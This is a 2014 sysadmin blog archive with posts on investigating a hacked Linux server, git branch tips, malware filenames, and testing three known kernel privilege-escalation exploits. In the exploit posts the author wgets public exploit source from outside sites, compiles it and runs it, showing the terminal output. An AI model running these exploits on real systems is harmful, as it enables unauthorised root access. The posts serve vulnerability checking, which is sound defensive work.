Saturday, August 30, 2014

What should you do if the server you administered got hacked.

If you realized that your server has been compromised, this discovery will create confusion, reduce confidence and if the server is serving user requests, you have to declare down time. That's not good.

In order to restore service as quickly as possible, it is best if you have a server ready to replace instantly, that you can reduce the noise from the customers. But in order to prevent such attack coming in the future, you must at least identify how it happened and taking counter measurement.

In this article, we will learn how to discover, and then taking counter measure.

Quick solution.

Probably the quickest solution is to format and reinstall the operating system together with your applications that serve user requests. This probably is good if you do not have a backup server and you want to reinstate the server to serve user requests as soon as possible. But this does not solve the actual problem on how the hacked took place. Hence, it might happen again in the near future.

Long and workable solution.

  1. identify your own custom application deployed and start to investigate from there.

  2. update the system using package manager and restart system.

  3. tighten up security


identify your own custom application deployed and start to investigate from there.

Because open source are mostly tested well and updated often, the first place you are going to investigate mostly come from your own application. Hence, you must at least have good understanding about your app and so to quickly identify source of problem.

Following are a sets of commands which might able to help you in your investigation.

  • w
    who is on the server

  • sudo netstat -nalp | grep ":22"
    change 22 to your application listen to. check if there is any abnormally.

  • if you are using opensource for your custom applications, check the log as well. For which attacker will always find the exploit for the opensource softwares and started to target those.


update the system using package manager and restart system.

First you can start by checking.

  • last
    check when was invalid last access.

  • cat /var/log/secure* | grep Accept
    check invalid access.

  • ps -elf
    check if the malware is running and if you spot one, get the process where it run from and delete all malware files.

  • ls /tmp /var/tmp /dev/shm -la
    this directory normally allow process to write in, so you might want to check any fishy files here.

  • file <filename>
    check what type of the file.

  • cat /etc/passwd
    check if there is unknown entry which is not supposed to be there.

  • sudo netstat -plant |awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' |sort | uniq -c | sort -n| tail
    4 ESTABLISHED java
    4 LISTEN kadmind
    5 LISTEN java
    5 LISTEN python
    6 ESTABLISHED python
    if your server has been turned into a trojan, the malware will probably launching a lot of ddos, with this command, you should be able to identify if the cp connection has been spike.

  • sudo netstat -plant | awk '$4 ~ /:22$/ {print $5}' | cut -f1 -d: | sort | uniq -c | sort -n
    1
    1 0.0.0.0
    2 192.168.0.2
    check total connection established to your server on port 22.

  • sudo netstat -plant | awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
    2 CLOSING
    4 SYN_RECV
    5 LAST_ACK
    6 FIN_WAIT1
    12 LISTEN
    13 FIN_WAIT2
    344 TIME_WAIT
    977 ESTABLISHED
    check network states, this is a good information should your server suddenly spike in the state established or state syn. if there is any spike, you will know something maybe gone fishy.

  • $HOME/.bash_history
    check every users bash_history to see if there is any suspect. If the server application run user a user id, especially check the bash_history in the user home directory.

  • find / -mtime 5
    find what files has been changes since 5 days ago.


If there is nothing found, just update the system packages using package manager and reboot the system.

tighten up security and monitor

if you have a loose firewall policy (iptables or some hardware firewall), you should review it.

Prevention in the future would probably notify when the count of TCP connection exceed or suddenly spike to a threshold.

 

whilst these steps are not exhaustive, as evil people always come with different type attacks, thus you should be prepare and be alert. Gather information using google as well.

Friday, August 29, 2014

Where to read branch work (or commits) in github?

Have you been stuck either of these situations:

  • a lot of times, when you do your works on branch, and as days passed, you wanna review your own codes by browsing through the history but no idea how?

  • or maybe you want to let you colleague take a look at the work you have done and code review for you?

  • or see the changes you made in the branch and write a change log before you merge back into the master branch.


Today, we are going to learn just that.

With command line, you can use git log. LEAD-451 is an example of my branch and it is here for illustration purposes but you should change to the branch you want to view.
git log master...LEAD-451

this will show the changes including commit, author, date, message. If you notice, the order is chronological, with latest being to top and oldest at the bottom. You can use --reverse to see the oldest first.

If you want to see the file status, if you add --name-status to the command

.If you want to see the actual code changes, it is very intuitive, you use git diff. So
git diff master...LEAD-451

and you get a lengthy code different output between branch master and branch LEAD-451. If you want to generate a patch, you can give -p to the command. If you want to see what files change/add/delete between these two branches, you can add parameter --name-status or --name-only.

Enough for the command line, now we go for some visual representation. For this, I will illustrate using github.

With the same condition, in github, there is a feature called compare view.

https://github.com/Opentracker/luceneOnCassandra/compare/master...LEAD-451

As you can see on the bottom, the output is very much same with the command line we have tried before this. But github condense everything into one , very nice.

Assuming you are at your project landing page at github, how do you quickly get the compare view?

  • at the front page, https://github.com/Opentracker/luceneOnCassandra/

  • click on the branch drop down, select the branch you want to diff. example LEAD-451

  • at the page https://github.com/Opentracker/luceneOnCassandra/tree/LEAD-451, you can click on the compare button.


 

That's it, I hope you learned something and please donate as a mean to continue funding this blog maintenance. Thank you.

Sunday, August 17, 2014

CVE-2009-2692 Linux NULL pointer dereference due to incorrect proto_ops initializations

Again as same with previous cve posts, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source (or you can download original source here) is written in c and it require some level of understanding into linux system as well. You should find explanation for the source exploit.c herehere or here.  As explain in the documentation, this exploit mainly target this kernel version:

  • kernel 2.6.0 to 2.6.30.4

  • kernel 2.4.4 to 2.4.37.4


So check your system if your server kernel falled within this range and do a kernel update if it does as there is already fixed.

According to the cve, description for this exploit

The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.

Okay, let's download the source and try it.
user@localhost:~/Desktop/exploit/wunderbar_emporium$ whoami
user
user@localhost:~/Desktop/exploit/wunderbar_emporium$ sh -x wunderbar_emporium.sh
++ pwd
++ sed 's/\//\\\//g'
+ ESCAPED_PWD='\/home\/user\/Desktop\/exploit\/wunderbar_emporium'
+ sed 's/\/home\/spender/\/home\/user\/Desktop\/exploit\/wunderbar_emporium/g' pwnkernel.c
+ mv pwnkernel.c pwnkernel2.c
+ mv pwnkernel1.c pwnkernel.c
+ killall -9 pulseaudio
++ uname -p
+ IS_64=unknown
+ OPT_FLAG=
+ '[' unknown = x86_64 ']'
++ cat /proc/sys/vm/mmap_min_addr
+ MINADDR=65536
+ '[' 65536 = '' -o 65536 = 0 ']'
+ '[' '!' -f /usr/sbin/getenforce ']'
+ cc -fno-stack-protector -fPIC -shared -o exploit.so exploit.c
+ cc -o pwnkernel pwnkernel.c
+ ./pwnkernel
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!
+ mv -f pwnkernel2.c pwnkernel.c
user@localhostp:~/Desktop/exploit/wunderbar_emporium$ whoami
user

So this server is not vulnerable for this exploit! All good.

Saturday, August 16, 2014

how to push branch work to github and list unpushed git commit

Often time when we work on issue, we branch from master branch and started our development on the branch. However, if the branch work never published, your co developer cannot read the changes. In this article, we are going to learn how
to publish the branch work to github.

You should have familiar basic branch work in git. Example.
git branch my-branch-work
git checkout my-branch-work
// do develope work here until you are ready to merge to the master branch.
git checkout master
git merge my-branch-work

If your local branch has set to my-branch-work, if you are trying to pull down from github, you will get similar message below.
There is no tracking information for the current branch.
Please specify which branch you want to merge with.
See git-pull(1) for details

git pull <remote> <branch>

If you wish to set tracking information for this branch you can do so with:

git branch --set-upstream-to=origin/<branch> my-branch-work

That is when you should start to push your branch work to github.
jason@localhost:~$ git push -u origin my-branch-work
Username for 'https://github.com': xxxxxx
Password for 'https://xxxxxx@github.com':
Total 0 (delta 0), reused 0 (delta 0)
To https://github.com/organization/myproject.git
* [new branch] my-branch-work -> my-branch-work
Branch my-branch-work set up to track remote branch my-branch-work from origin.

Then make sure your local branch is also pointed to the correct branch
$ git branch
* my-branch-work
master

The next time you do git pull, you will not receive the error. If you want to push your branch changes to github, you should use this command.
$ git push origin my-branch-work
Username for 'https://github.com': xxxxxx
Password for 'https://xxxxxx@github.com':
Counting objects: 10, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (7/7), done.
Writing objects: 100% (10/10), 2.73 KiB | 0 bytes/s, done.
Total 10 (delta 3), reused 0 (delta 0)
To https://github.com/organization/myproject.git
954be4a..5c1bcb6 my-branch-work -> my-branch-work

Often times, when you commit locally and you go on develop. Then probably pause for some period of time due to other priority works, and when you come back and do git status, you started to notice, hey, there is some local commit which you did not push but you forgotten what is actually in the commit. So is there a way to view it?
$ git status
On branch master
Your branch is ahead of 'origin/master' by 2 commits.
(use "git push" to publish your local commits)

Yes, there is, you can use command like git log origin/master..HEAD

Some additional command which is helpful including viewing the different using command git diff origin/master..HEAD

That's it, I hope you like it and you can donate via our donation page. Thank you.

Friday, August 15, 2014

information for malware Linux_time_y_2014 and Linux_time_y_2015 are needed

This article is a bit special. It is more like seeking information and documentating it. If you have this type of information, please leave your comment below.

If you have noticed that the followings file exists in your system

  • Linux_time_y_2014

  • Linux_time_y_2015 or xudp

  • .E7739C9DFEAC5B8A69A114E45AB327D41 or mysql1.0

  • .E7739C9DFEAC5B8A69A114E45AB327D4 or mysql1s


This is a malwares which if it is uploaded or copy to your server, you should check if it is running in the system and remove if it does.

I googled and search in social sites, there is not much information other than identified this as a malware. If you happened to know what cve or where is the source, please kindly leave the message in the comment.

The intention is to understand what does this malware does other than launching it as ddos. To document it down here and to provide information to others if they seek more information. If you know how to disect this binary and analyze the content, please do share as well.

Thank you.

Sunday, August 3, 2014

CVE-2014-0196 kernel: pty layer race condition leading to memory corruption

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source is written in c and it require some level of understanding into linux system as well. You should find explanation for the source cve-2014-0196-md.c here. If you run an old system, then you might want to read more. But check your kernel that comes with your distribution, it may already been fixed.

From the description:

The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.

Okay, let's move on to compile and test it out.
user@localhost:~$ wget -O cve-2014-0196-md.c http://bugfuzz.com/stuff/cve-2014-0196-md.c
user@localhost:~$ gcc cve-2014-0196-md.c -lutil -lpthread
user@localhost:~$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: 0xffffffff8105bb28
[+] Resolved prepare_kernel_cred: 0xffffffff8105bd3b
[+] Doing once-off allocations
[+] Attempting to overflow into a tty_struct......
........................................................................................................................................................................................................................................................................................................................................................................................................................^C

Apparently this kernel is not vulnerable to this exploit. Another great day. :-)

Saturday, August 2, 2014

CVE-2012-0056 mempodipper

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source is written in c and it require some level of understanding into linux system as well. You should find explanation for the source mempodipper.c here. But it has since been fix in this patch. So all of the distribution should have this fix in the kernel anyway. But in case you run at old system with kernel 2.6.39 or a non stock kernel, then you might want to read more.

With that said, let's download this source and compile it.
user@localhost:~$ wget http://www.exploit-db.com/download/18411 -O 18411.c
--2014-07-19 16:52:59-- http://www.exploit-db.com/download/18411
Resolving www.exploit-db.com (www.exploit-db.com)... 192.99.12.218, 198.58.102.135
Connecting to www.exploit-db.com (www.exploit-db.com)|192.99.12.218|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/18411/ [following]
--2014-07-19 16:53:00-- http://www.exploit-db.com/download/18411/
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 6348 (6.2K) [application/txt]
Saving to: ‘18411.c’

100%[====================================================================================================================>] 6,348 --.-K/s in 0.001s

2014-07-19 16:53:00 (7.31 MB/s) - ‘18411.c’ saved [6348/6348]

user@localhost:~$ gcc 18411.c -o 18411
user@localhost:~$ ./18411
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7398/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x4022c0.
[+] Calculating su padding.
[+] Seeking to offset 0x4022a6.
[+] Executing su with shellcode.
^C
user@localhost:~$ whoami
user

So we have downloaded the source, compile it using gcc and run it. If you notice in the video, if the kernel are vulnerable to this exploit, this exploit will finish run successfully and issue the command whoami, root is shown. But for this example above, my kernel is compiled with the fix so the computer system is safe. You can get this library and copy to the server you want to check to make sure the exploit did not run successfully.

That's it for this article, I hope you enjoy this writing.